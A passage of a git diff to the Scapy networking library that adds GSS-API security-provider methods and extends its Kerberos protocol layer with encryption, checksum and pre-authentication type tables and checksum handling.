NotImplementedError + + @abc.abstractmethod + def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): + """ + GSS_Accept_sec_context: server-side call for the SSP + """ + raise NotImplementedError + + # MS additions (*Ex functions) + + @dataclass + class WRAP_MSG: + conf_req_flag: bool + sign: bool + data: bytes + + @abc.abstractmethod + def GSS_WrapEx( + self, Context: CONTEXT, msgs: List[WRAP_MSG], qop_req: int = 0 + ) -> Tuple[List[WRAP_MSG], Any]: + """ + GSS_WrapEx + + :param Context: the SSP context + :param qop_req: int (0 specifies default QOP) + :param msgs: list of WRAP_MSG + + :returns: (data, signature) + """ + raise NotImplementedError + + @abc.abstractmethod + def GSS_UnwrapEx( + self, Context: CONTEXT, msgs: List[WRAP_MSG], signature + ) -> List[WRAP_MSG]: + """ + :param Context: the SSP context + :param msgs: list of WRAP_MSG + :param signature: the signature + + :raises ValueError: if MIC failure. + :returns: data + """ + raise NotImplementedError + + @dataclass + class MIC_MSG: + sign: bool + data: bytes + + @abc.abstractmethod + def GSS_GetMICEx( + self, Context: CONTEXT, msgs: List[MIC_MSG], qop_req: int = 0 + ) -> Any: + """ + GSS_GetMICEx + + :param Context: the SSP context + :param qop_req: int (0 specifies default QOP) + :param msgs: list of VERIF_MSG + + :returns: signature + """ + raise NotImplementedError + + @abc.abstractmethod + def GSS_VerifyMICEx(self, Context: CONTEXT, msgs: List[MIC_MSG], signature) -> None: + """ + :param Context: the SSP context + :param msgs: list of VERIF_MSG + :param signature: the signature + + :raises ValueError: if MIC failure. + """ + raise NotImplementedError + + # RFC 2743 + + # sect 2.3.1 + + def GSS_GetMIC(self, Context: CONTEXT, message: bytes, qop_req: int = 0): + return self.GSS_WrapEx( + Context, + [ + self.MIC_MSG( + sign=True, + data=message, ) ], - length_from=lambda pkt: pkt.cbMessageLength - pkt.cbHeaderLength), - ] - - -class NEGOEX_VERIFY_MESSAGE(Packet): - show_indent = 0 - fields_desc = [ - NEGOEX_MESSAGE_HEADER, - UUIDEnumField("AuthScheme", None, _NEGOEX_AUTH_SCHEMES), - PacketField("Checksum", NEGOEX_CHECKSUM(), - NEGOEX_CHECKSUM) - ] - - -bind_layers(NEGOEX_NEGO_MESSAGE, NEGOEX_NEGO_MESSAGE) - - -_mechDissector["1.3.6.1.4.1.311.2.2.30"] = NEGOEX_NEGO_MESSAGE - -# GSS API Blob -# https://datatracker.ietf.org/doc/html/rfc2743 - - -_GSSAPI_OIDS = { - "1.3.6.1.5.5.2": SPNEGO_negToken, # SPNEGO: RFC 2478 - "1.2.840.113554.1.2.2": KRB5_GSS, # RFC 1964 -} - -# sect 3.1 + qop_req=qop_req, + ) + # sect 2.3.2 -class GSSAPI_BLOB(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SNMP_GSSAPI_APPLICATION( - ASN1F_OID("MechType", "1.3.6.1.5.5.2"), - ASN1F_PACKET("innerContextToken", SPNEGO_negToken(), SPNEGO_negToken, - next_cls_cb=lambda pkt: _GSSAPI_OIDS.get( - pkt.MechType.val, conf.raw_layer)) - ) + def GSS_VerifyMIC(self, Context: CONTEXT, message: bytes, signature): + self.GSS_VerifyMICEx( + Context, + [ + self.MIC_MSG( + sign=True, + data=message, + ) + ], + signature, + ) - @classmethod - def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt and len(_pkt) >= 1: - if ord(_pkt[:1]) & 0xa0 >= 0xa0: - # XXX: sometimes the token is raw, we should look from - # the session what to use here. For now: hardcode SPNEGO - # (THIS IS A VERY STRONG ASSUMPTION) - return SPNEGO_negToken - if _pkt[:7] == b"NTLMSSP": - # XXX: if no mechTypes are provided during SPNEGO exchange, - # Windows falls back to a plain NTLM_Header. - return NTLM_Header.dispatch_hook(_pkt=_pkt, *args, **kargs) - return cls + # sect 2.3.3 + + def GSS_Wrap( + self, + Context: CONTEXT, + input_message: bytes, + conf_req_flag: bool, + qop_req: int = 0, + ): + _msgs, signature = self.GSS_WrapEx( + Context, + [ + self.WRAP_MSG( + conf_req_flag=conf_req_flag, + sign=True, + data=input_message, + ) + ], + qop_req=qop_req, + ) + return _msgs[0].data, signature + + # sect 2.3.4 + + def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes): + return self.GSS_WrapEx( + Context, + [ + self.WRAP_MSG( + conf_req_flag=True, + sign=True, + data=input_message, + ) + ], + )[0].data + + # MISC + + def NegTokenInit2(self): + """ + Server-Initiation + See [MS-SPNG] sect 3.2.5.2 + """ + return None, None + + def canMechListMIC(self, Context: CONTEXT): + """ + Returns whether or not mechListMIC can be computed + """ + return False + + def LegsAmount(self, Context: CONTEXT): + """ + Returns the amount of 'legs' (how MS calls it) of the SSP. + + i.e. 2 for Kerberos, 3 for NTLM + """ + return 2 diff --git a/scapy/layers/http.py b/scapy/layers/http.py index a2b263d0f6b..f2b3bd5e7a6 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -682,7 +682,6 @@ def http_request(host, path="/", port=80, timeout=3, :returns: the HTTPResponse packet """ - from scapy.sessions import TCPSession http_headers = { "Accept_Encoding": b'gzip, deflate', "Cache_Control": b'no-cache', @@ -715,7 +714,6 @@ def http_request(host, path="/", port=80, timeout=3, try: ans = sock.sr1( req, - session=TCPSession(app=True), timeout=timeout, verbose=verbose ) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 6cab5db038b..046d2141b9f 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -2029,6 +2029,11 @@ def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 def i2len(self, pkt, x): return len(self.i2m(pkt, x)) + def i2h(self, pkt, x): + if not x: + return [] + return x + def m2i(self, pkt, x): x = plain_str(x) # Decode bytes to string res = [] diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 69aa768a014..01fc1dc0ada 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy # See https://scapy.net/ for more information -# Copyright (C) Gabriel Potter +# Copyright (C) Gabriel Potter r""" Kerberos V5 @@ -11,37 +11,52 @@ - Kerberos Network Authentication Service (V5): RFC4120 - Kerberos Version 5 GSS-API: RFC1964, RFC4121 - Kerberos Pre-Authentication: RFC6113 (FAST) - -You will find more complete documentation for this layer over -`Kerberos `_ - -Example decryption: - ->>> from scapy.libs.rfc3961 import Key, EncryptionType ->>> pkt = Ether(hex_bytes("525400695813525400216c2b08004500015da71840008006dc\ -83c0a87a9cc0a87a11c209005854f6ab2392c25bd650182014b6e00000000001316a8201\ -2d30820129a103020105a20302010aa3633061304ca103020102a24504433041a0030201\ -12a23a043848484decb01c9b62a1cabfbc3f2d1ed85aa5e093ba8358a8cea34d4393af93\ -bf211e274fa58e814878db9f0d7a28d94e7327660db4f3704b3011a10402020080a20904\ -073005a0030101ffa481b73081b4a00703050040810010a1123010a003020101a1093007\ -1b0577696e3124a20e1b0c444f4d41494e2e4c4f43414ca321301fa003020102a1183016\ -1b066b72627467741b0c444f4d41494e2e4c4f43414ca511180f32303337303931333032\ -343830355aa611180f32303337303931333032343830355aa7060204701cc5d1a8153013\ -0201120201110201170201180202ff79020103a91d301b3019a003020114a11204105749\ -4e31202020202020202020202020")) ->>> enc = pkt[Kerberos].root.padata[0].padataValue ->>> k = Key(enc.etype.val, key=hex_bytes("7fada4e566ae4fb270e2800a23a\ -e87127a819d42e69b5e22de0ddc63da80096d")) ->>> enc.decrypt(k) +- Kerberos Principal Name Canonicalization and Cross-Realm Referrals: RFC6806 +- Microsoft Windows 2000 Kerberos Change Password and Set Password Protocols: RFC3244 +- User to User Kerberos Authentication: draft-ietf-cat-user2user-03 +- Public Key Cryptography Based User-to-User Authentication (PKU2U): draft-zhu-pku2u-09 +- Initial and Pass Through Authentication Using Kerberos V5 (IAKERB): + draft-ietf-kitten-iakerb-03 +- Kerberos Protocol Extensions: [MS-KILE] +- Kerberos Protocol Extensions: Service for User: [MS-SFU] + + +.. note:: + You will find more complete documentation for this layer over + `Kerberos `_ + +Example decryption:: + + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> pkt = Ether(hex_bytes("525400695813525400216c2b08004500015da71840008006dc\ + 83c0a87a9cc0a87a11c209005854f6ab2392c25bd650182014b6e00000000001316a8201\ + 2d30820129a103020105a20302010aa3633061304ca103020102a24504433041a0030201\ + 12a23a043848484decb01c9b62a1cabfbc3f2d1ed85aa5e093ba8358a8cea34d4393af93\ + bf211e274fa58e814878db9f0d7a28d94e7327660db4f3704b3011a10402020080a20904\ + 073005a0030101ffa481b73081b4a00703050040810010a1123010a003020101a1093007\ + 1b0577696e3124a20e1b0c444f4d41494e2e4c4f43414ca321301fa003020102a1183016\ + 1b066b72627467741b0c444f4d41494e2e4c4f43414ca511180f32303337303931333032\ + 343830355aa611180f32303337303931333032343830355aa7060204701cc5d1a8153013\ + 0201120201110201170201180202ff79020103a91d301b3019a003020114a11204105749\ + 4e31202020202020202020202020")) + >>> enc = pkt[Kerberos].root.padata[0].padataValue + >>> k = Key(enc.etype.val, key=hex_bytes("7fada4e566ae4fb270e2800a23a\ + e87127a819d42e69b5e22de0ddc63da80096d")) + >>> enc.decrypt(k) """ from collections import namedtuple -from datetime import datetime, timedelta +from datetime import datetime, timedelta, timezone +from enum import IntEnum + +import os import re import socket import struct +from scapy.error import warning import scapy.asn1.mib # noqa: F401 +from scapy.asn1.ber import BER_id_dec, BER_Decoding_Error from scapy.asn1.asn1 import ( ASN1_BIT_STRING, ASN1_BOOLEAN, @@ -75,20 +90,45 @@ from scapy.error import log_runtime from scapy.fields import ( ByteField, + ConditionalField, + FieldLenField, FlagsField, + IntEnumField, + LEIntEnumField, LEIntField, LenField, LEShortEnumField, LEShortField, + MultipleTypeField, + PacketField, + PacketLenField, + PacketListField, PadField, + ShortEnumField, ShortField, + StrField, + StrFieldUtf16, StrFixedLenEnumField, + XLEIntField, XStrFixedLenField, + XStrLenField, ) -from scapy.packet import Packet, bind_bottom_up, bind_layers +from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers from scapy.supersocket import StreamSocket -from scapy.volatile import GeneralizedTime, RandNum - +from scapy.volatile import GeneralizedTime, RandNum, RandBin + +from scapy.layers.gssapi import ( + SSP, + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, + GSSAPI_BLOB, + GSS_S_COMPLETE, + GSS_S_DEFECTIVE_TOKEN, + GSS_S_CONTINUE_NEEDED, + GSS_S_BAD_MECH, + GSS_S_FAILURE, + GssChannelBindings, +) from scapy.layers.inet import TCP, UDP # kerberos APPLICATION @@ -99,11 +139,11 @@ class ASN1_Class_KRB(ASN1_Class_UNIVERSAL): APPLICATION = 0x60 -class ASN1_GSSAPI_APPLICATION(ASN1_SEQUENCE): +class ASN1_KRB_APPLICATION(ASN1_SEQUENCE): tag = ASN1_Class_KRB.APPLICATION -class BERcodec_GSSAPI_APPLICATION(BERcodec_SEQUENCE): +class BERcodec_KRB_APPLICATION(BERcodec_SEQUENCE): tag = ASN1_Class_KRB.APPLICATION @@ -119,6 +159,18 @@ class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): Int32 = ASN1F_INTEGER UInt32 = ASN1F_INTEGER +_PRINCIPAL_NAME_TYPES = { + 0: "NT-UNKNOWN", + 1: "NT-PRINCIPAL", + 2: "NT-SRV-INST", + 3: "NT-SRV-HST", + 4: "NT-SRV-XHST", + 5: "NT-UID", + 6: "NT-X500-PRINCIPAL", + 7: "NT-SMTP-NAME", + 10: "NT-ENTERPRISE", +} + class PrincipalName(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -126,199 +178,99 @@ class PrincipalName(ASN1_Packet): ASN1F_enum_INTEGER( "nameType", 0, - { - 0: "NT-UNKNOWN", - 1: "NT-PRINCIPAL", - 2: "NT-SRV-INST", - 3: "NT-SRV-HST", - 4: "NT-SRV-XHST", - 5: "NT-UID", - 6: "NT-X500-PRINCIPAL", - 7: "NT-SMTP-NAME", - 10: "NT-ENTERPRISE", - }, + _PRINCIPAL_NAME_TYPES, explicit_tag=0xA0, ), ASN1F_SEQUENCE_OF("nameString", [], KerberosString, explicit_tag=0xA1), ) + @staticmethod + def fromUPN(upn: str): + user, _ = _parse_upn(upn) + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(user)], + nameType=ASN1_INTEGER(1), # NT-PRINCIPAL + ) -KerberosTime = ASN1F_GENERALIZED_TIME -Microseconds = ASN1F_INTEGER - + @staticmethod + def fromSPN(spn: bytes): + spn, _ = _parse_spn(spn) + if spn.startswith("krbtgt"): + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(x) for x in spn.split("/")], + nameType=ASN1_INTEGER(2), # NT-SRV-INST + ) + else: + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(x) for x in spn.split("/")], + nameType=ASN1_INTEGER(3), # NT-SRV-HST + ) -class HostAddress(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_enum_INTEGER( - "addrType", - 0, - { - # RFC4120 sect 7.5.3 - 2: "IPv4", - 3: "Directional", - 5: "ChaosNet", - 6: "XNS", - 7: "ISO", - 12: "DECNET Phase IV", - 16: "AppleTalk DDP", - 20: "NetBios", - 24: "IPv6", - }, - explicit_tag=0xA0, - ), - ASN1F_STRING("address", "", explicit_tag=0xA1), - ) +KerberosTime = ASN1F_GENERALIZED_TIME +Microseconds = ASN1F_INTEGER -HostAddresses = lambda name, **kwargs: ASN1F_SEQUENCE_OF( - name, [], HostAddress, **kwargs -) -Checksum = lambda **kwargs: ASN1F_SEQUENCE( - ASN1F_enum_INTEGER( - "checksumtype", - 0, - { - # RFC3961 sect 8 - 1: "CRC32", - 2: "RSA-MD4", - 3: "RSA-MD4-DES", - 4: "DES-MAC", - 5: "DES-MAC-K", - 6: "RSA-MD4-DES-K", - 7: "RSA-MD5", - 8: "RSA-MD5-DES", - 9: "RSA-MD5-DES3", - 10: "SHA1", - 12: "HMAC-SHA1-DES3-KD", - 13: "HMAC-SHA1-DES3", - 14: "SHA1", - 15: "HMAC-SHA1-96-AES128", - 16: "HMAC-SHA1-96-AES256", - }, - explicit_tag=0xA0, - ), - ASN1F_STRING("checksum", "", explicit_tag=0xA1), - **kwargs -) +# https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#kerberos-parameters-1 -_AUTHORIZATIONDATA_VALUES = { - # Filled below +_KRB_E_TYPES = { + 1: "DES-CBC-CRC", + 2: "DES-CBC-MD4", + 3: "DES-CBC-MD5", + 5: "DES3-CBC-MD5", + 7: "DES3-CBC-SHA1", + 9: "DSAWITHSHA1-CMSOID", + 10: "MD5WITHRSAENCRYPTION-CMSOID", + 11: "SHA1WITHRSAENCRYPTION-CMSOID", + 12: "RC2CBC-ENVOID", + 13: "RSAENCRYPTION-ENVOID", + 14: "RSAES-OAEP-ENV-OID", + 15: "DES-EDE3-CBC-ENV-OID", + 16: "DES3-CBC-SHA1-KD", + 17: "AES128-CTS-HMAC-SHA1-96", + 18: "AES256-CTS-HMAC-SHA1-96", + 19: "AES128-CTS-HMAC-SHA256-128", + 20: "AES256-CTS-HMAC-SHA384-192", + 23: "RC4-HMAC", + 24: "RC4-HMAC-EXP", + 25: "CAMELLIA128-CTS-CMAC", + 26: "CAMELLIA256-CTS-CMAC", } - -class _ASN1FString_PacketField(ASN1F_STRING): - holds_packets = 1 - - def i2m(self, pkt, val): - if isinstance(val, ASN1_Packet): - val = ASN1_STRING(bytes(val)) - return super(_ASN1FString_PacketField, self).i2m(pkt, val) - - def any2i(self, pkt, x): - if hasattr(x, "add_underlayer"): - x.add_underlayer(pkt) - return super(_ASN1FString_PacketField, self).any2i(pkt, x) - - -class _AuthorizationData_value_Field(_ASN1FString_PacketField): - def m2i(self, pkt, s): - val = super(_AuthorizationData_value_Field, self).m2i(pkt, s) - if pkt.adType.val in _PADATA_CLASSES: - cls = _AUTHORIZATIONDATA_VALUES.get(pkt.adType.val, None) - if not val[0].val: - return val - if cls: - return cls(val[0].val, _underlayer=pkt), val[1] - return val - - -class AuthorizationDataItem(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_enum_INTEGER( - "adType", - 0, - { - # RFC4120 sect 7.5.4 - 1: "AD-IF-RELEVANT", - 2: "AD-INTENDED-FOR-SERVER", - 3: "AD-INTENDED-FOR-APPLICATION-CLASS", - 4: "AD-KDC-ISSUED", - 5: "AD-AND-OR", - 6: "AD-MANDATORY-TICKET-EXTENSIONS", - 7: "AD-IN-TICKET-EXTENSIONS", - 8: "AD-MANDATORY-FOR-KDC", - 64: "OSF-DCE", - 65: "SESAME", - 66: "AD-OSD-DCE-PKI-CERTID", - 128: "AD-WIN2K-PAC", - 129: "AD-ETYPE-NEGOTIATION", - }, - explicit_tag=0xA0, - ), - _AuthorizationData_value_Field("adData", "", explicit_tag=0xA1), - ) - - -class AuthorizationData(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE_OF( - "seq", [AuthorizationDataItem()], AuthorizationDataItem - ) - - -AD_IF_RELEVANT = AuthorizationData -_AUTHORIZATIONDATA_VALUES[1] = AD_IF_RELEVANT - - -class AD_KDCIssued(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - Checksum(explicit_tag=0xA0), - ASN1F_optional( - Realm("iRealm", "", explicit_tag=0xA1), - ), - ASN1F_optional(ASN1F_PACKET("iSname", None, PrincipalName, explicit_tag=0xA2)), - ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA3), - ) - - -_AUTHORIZATIONDATA_VALUES[4] = AD_KDCIssued - - -class AD_AND_OR(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - Int32("conditionCount", 0, explicit_tag=0xA0), - ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA1), - ) - - -_AUTHORIZATIONDATA_VALUES[5] = AD_AND_OR - -ADMANDATORYFORKDC = AuthorizationData -_AUTHORIZATIONDATA_VALUES[8] = ADMANDATORYFORKDC - - -# back to RFC4120 - - -_KRB_E_TYPES = { - 0x1: "DES", - 0x10: "3DES", - 0x11: "AES-128", - 0x12: "AES-256", - 0x17: "RC4", +# https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#kerberos-parameters-2 + +_KRB_S_TYPES = { + 1: "CRC32", + 2: "RSA-MD4", + 3: "RSA-MD4-DES", + 4: "DES-MAC", + 5: "DES-MAC-K", + 6: "RSA-MD4-DES-K", + 7: "RSA-MD5", + 8: "RSA-MD5-DES", + 9: "RSA-MD5-DES3", + 10: "SHA1", + 12: "HMAC-SHA1-DES3-KD", + 13: "HMAC-SHA1-DES3", + 14: "SHA1", + 15: "HMAC-SHA1-96-AES128", + 16: "HMAC-SHA1-96-AES256", + 17: "CMAC-CAMELLIA128", + 18: "CMAC-CAMELLIA256", + 19: "HMAC-SHA256-128-AES128", + 20: "HMAC-SHA384-192-AES256", + # RFC 4121 + 0x8003: "KRB-AUTHENTICATOR", + # [MS-KILE] + 0xFFFFFF76: "MD5", } class EncryptedData(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_enum_INTEGER("etype", 0x1, _KRB_E_TYPES, explicit_tag=0xA0), - ASN1F_optional(UInt32("kvno", 0, explicit_tag=0xA1)), + ASN1F_enum_INTEGER("etype", 0x17, _KRB_E_TYPES, explicit_tag=0xA0), + ASN1F_optional(UInt32("kvno", None, explicit_tag=0xA1)), ASN1F_STRING("cipher", "", explicit_tag=0xA2), ) @@ -339,9 +291,26 @@ def get_usage(self): elif isinstance(self.underlayer, KRB_AS_REP): # AS-REP encrypted part return 3, EncASRepPart + elif isinstance(self.underlayer, KRB_AP_REQ) and isinstance( + self.underlayer.underlayer, PADATA + ): + # TGS-REQ PA-TGS-REQ Authenticator + return 7, KRB_Authenticator + elif isinstance(self.underlayer, KRB_TGS_REP): + # TGS-REP encrypted part + return 8, EncTGSRepPart elif isinstance(self.underlayer, KRB_AP_REQ): # AP-REQ Authenticator return 11, KRB_Authenticator + elif isinstance(self.underlayer, KRB_AP_REP): + # AP-REP encrypted part + return 12, EncAPRepPart + elif isinstance(self.underlayer, KRB_PRIV): + # KRB-PRIV encrypted part + return 13, EncKrbPrivPart + elif isinstance(self.underlayer, KRB_CRED): + # KRB-CRED encrypted part + return 14, EncKrbCredPart elif isinstance(self.underlayer, KrbFastArmoredReq): # KEY_USAGE_FAST_ENC return 51, KrbFastReq @@ -363,7 +332,28 @@ def decrypt(self, key, key_usage_number=None, cls=None): key_usage_number, cls = self.get_usage() d = key.decrypt(key_usage_number, self.cipher.val) if cls: - return cls(d) + try: + return cls(d) + except BER_Decoding_Error: + if cls == EncASRepPart: + # https://datatracker.ietf.org/doc/html/rfc4120#section-5.4.2 + # "Compatibility note: Some implementations unconditionally send an + # encrypted EncTGSRepPart (application tag number 26) in this field + # regardless of whether the reply is a AS-REP or a TGS-REP. In the + # interest of compatibility, implementors MAY relax the check on the + # tag number of the decrypted ENC-PART." + try: + res = EncTGSRepPart(d) + # https://github.com/krb5/krb5/blob/48ccd81656381522d1f9ccb8705c13f0266a46ab/src/lib/krb5/asn.1/asn1_k_encode.c#L1128 + # This is a bug because as the RFC clearly says above, we're + # perfectly in our right to be strict on this. (MAY) + log_runtime.warning( + "Implementation bug detected. This looks like MIT Kerberos." + ) + return res + except BER_Decoding_Error: + pass + raise return d def encrypt(self, key, text, confounder=None, key_usage_number=None): @@ -378,8 +368,10 @@ def encrypt(self, key, text, confounder=None, key_usage_number=None): """ if key_usage_number is None: key_usage_number = self.get_usage()[0] - self.etype = key.eptype - self.cipher = key.encrypt(key_usage_number, text, confounder=confounder) + self.etype = key.etype + self.cipher = ASN1_STRING( + key.encrypt(key_usage_number, text, confounder=confounder) + ) class EncryptionKey(ASN1_Packet): @@ -392,12 +384,245 @@ class EncryptionKey(ASN1_Packet): def toKey(self): from scapy.libs.rfc3961 import Key - return Key(self.keytype.val, key=self.keyvalue.val) + return Key( + etype=self.keytype.val, + key=self.keyvalue.val, + ) + + @classmethod + def fromKey(self, key): + return EncryptionKey( + keytype=key.etype, + keyvalue=key.key, + ) + + +class _ASN1FString_PacketField(ASN1F_STRING): + holds_packets = 1 + + def i2m(self, pkt, val): + if isinstance(val, ASN1_Packet): + val = ASN1_STRING(bytes(val)) + return super(_ASN1FString_PacketField, self).i2m(pkt, val) + + def any2i(self, pkt, x): + if hasattr(x, "add_underlayer"): + x.add_underlayer(pkt) + return super(_ASN1FString_PacketField, self).any2i(pkt, x) + + +class _Checksum_Field(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_Checksum_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.cksumtype.val == 0x8003: + # Special case per RFC 4121 + return KRB_AuthenticatorChecksum(val[0].val, _underlayer=pkt), val[1] + return val + + +class Checksum(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "cksumtype", + 0, + _KRB_S_TYPES, + explicit_tag=0xA0, + ), + _Checksum_Field("checksum", "", explicit_tag=0xA1), + ) + + def get_usage(self): + """ + Get current key usage number + """ + # RFC 4120 sect 7.5.1 + if self.underlayer: + if isinstance(self.underlayer, KRB_Authenticator): + # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator cksum + # (n°10 should never happen as we use RFC4121) + return 6 + elif isinstance(self.underlayer, PA_FOR_USER): + # [MS-SFU] sect 2.2.1 + return 17 + elif isinstance(self.underlayer, PA_S4U_X509_USER): + # [MS-SFU] sect 2.2.1 + return 17 + elif isinstance(self.underlayer, AD_KDCIssued): + # AD-KDC-ISSUED checksum + return 19 + elif isinstance(self.underlayer, KrbFastArmoredReq): + # KEY_USAGE_FAST_REQ_CHKSUM + return 50 + raise ValueError( + "Could not guess key usage number. Please specify key_usage_number" + ) + + def verify(self, key, text, key_usage_number=None): + """ + Decrypt and return the data contained in cipher. + + :param key: the key to use to check the checksum + :param text: the bytes to verify + :param key_usage_number: (optional) specify the key usage number. + Guessed otherwise + """ + if key_usage_number is None: + key_usage_number = self.get_usage() + key.verify_checksum(key_usage_number, text, self.checksum.val) + + def make(self, key, text, key_usage_number=None, cksumtype=None): + """ + Encrypt text and set it into cipher. + + :param key: the key to use to make the checksum + :param text: the bytes to make a checksum of + :param key_usage_number: (optional) specify the key usage number. + Guessed otherwise + """ + if key_usage_number is None: + key_usage_number = self.get_usage() + self.cksumtype = cksumtype or key.cksumtype + self.checksum = ASN1_STRING( + key.make_checksum( + keyusage=key_usage_number, + text=text, + cksumtype=self.cksumtype, + ) + ) KerberosFlags = ASN1F_FLAGS +_ADDR_TYPES = { + # RFC4120 sect 7.5.3 + 0x02: "IPv4", + 0x03: "Directional", + 0x05: "ChaosNet", + 0x06: "XNS", + 0x07: "ISO", + 0x0C: "DECNET Phase IV", + 0x10: "AppleTalk DDP", + 0x14: "NetBios", + 0x18: "IPv6", +} + + +class HostAddress(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "addrType", + 0, + _ADDR_TYPES, + explicit_tag=0xA0, + ), + ASN1F_STRING("address", "", explicit_tag=0xA1), + ) + + +HostAddresses = lambda name, **kwargs: ASN1F_SEQUENCE_OF( + name, [], HostAddress, **kwargs +) + + +_AUTHORIZATIONDATA_VALUES = { + # Filled below +} + + +class _AuthorizationData_value_Field(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_AuthorizationData_value_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.adType.val in _AUTHORIZATIONDATA_VALUES: + return ( + _AUTHORIZATIONDATA_VALUES[pkt.adType.val](val[0].val, _underlayer=pkt), + val[1], + ) + return val + + +_AD_TYPES = { + # RFC4120 sect 7.5.4 + 1: "AD-IF-RELEVANT", + 2: "AD-INTENDED-FOR-SERVER", + 3: "AD-INTENDED-FOR-APPLICATION-CLASS", + 4: "AD-KDC-ISSUED", + 5: "AD-AND-OR", + 6: "AD-MANDATORY-TICKET-EXTENSIONS", + 7: "AD-IN-TICKET-EXTENSIONS", + 8: "AD-MANDATORY-FOR-KDC", + 64: "OSF-DCE", + 65: "SESAME", + 66: "AD-OSD-DCE-PKI-CERTID", + 128: "AD-WIN2K-PAC", + 129: "AD-ETYPE-NEGOTIATION", + # [MS-KILE] additions + 141: "KERB-AUTH-DATA-TOKEN-RESTRICTIONS", + 142: "KERB-LOCAL", + 143: "AD-AUTH-DATA-AP-OPTIONS", + 144: "AD-TARGET-PRINCIPAL", # not an official name +} + + +class AuthorizationDataItem(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "adType", + 0, + _AD_TYPES, + explicit_tag=0xA0, + ), + _AuthorizationData_value_Field("adData", "", explicit_tag=0xA1), + ) + + +class AuthorizationData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "seq", [AuthorizationDataItem()], AuthorizationDataItem + ) + + +AD_IF_RELEVANT = AuthorizationData +_AUTHORIZATIONDATA_VALUES[1] = AD_IF_RELEVANT + + +class AD_KDCIssued(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("adChecksum", Checksum(), Checksum, explicit_tag=0xA0), + ASN1F_optional( + Realm("iRealm", "", explicit_tag=0xA1), + ), + ASN1F_optional(ASN1F_PACKET("iSname", None, PrincipalName, explicit_tag=0xA2)), + ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA3), + ) + + +_AUTHORIZATIONDATA_VALUES[4] = AD_KDCIssued + +class AD_AND_OR(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("conditionCount", 0, explicit_tag=0xA0), + ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA1), + ) + + +_AUTHORIZATIONDATA_VALUES[5] = AD_AND_OR + +ADMANDATORYFORKDC = AuthorizationData +_AUTHORIZATIONDATA_VALUES[8] = ADMANDATORYFORKDC + + +# https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xml _PADATA_TYPES = { 1: "PA-TGS-REQ", 2: "PA-ENC-TIMESTAMP", @@ -410,12 +635,29 @@ def toKey(self): 19: "PA-ETYPE-INFO2", 20: "PA-SVR-REFERRAL-INFO", 128: "PA-PAC-REQUEST", + 129: "PA-FOR-USER", + 130: "PA-FOR-X509-USER", + 131: "PA-FOR-CHECK_DUPS", + 132: "PA-AS-CHECKSUM", 133: "PA-FX-COOKIE", 134: "PA-AUTHENTICATION-SET", 135: "PA-AUTH-SET-SELECTED", 136: "PA-FX-FAST", 137: "PA-FX-ERROR", + 138: "PA-ENCRYPTED-CHALLENGE", + 141: "PA-OTP-CHALLENGE", + 142: "PA-OTP-REQUEST", + 143: "PA-OTP-CONFIRM", + 144: "PA-OTP-PIN-CHANGE", + 145: "PA-EPAK-AS-REQ", + 146: "PA-EPAK-AS-REP", + 147: "PA_PKINIT_KX", + 148: "PA_PKU2U_NAME", + 149: "PA-REQ-ENC-PA-REP", + 150: "PA_AS_FRESHNESS", + 151: "PA-SPAKE", 165: "PA-SUPPORTED-ENCTYPES", + 166: "PA-EXTENDED-ERROR", 167: "PA-PAC-OPTIONS", } @@ -439,8 +681,8 @@ def m2i(self, pkt, 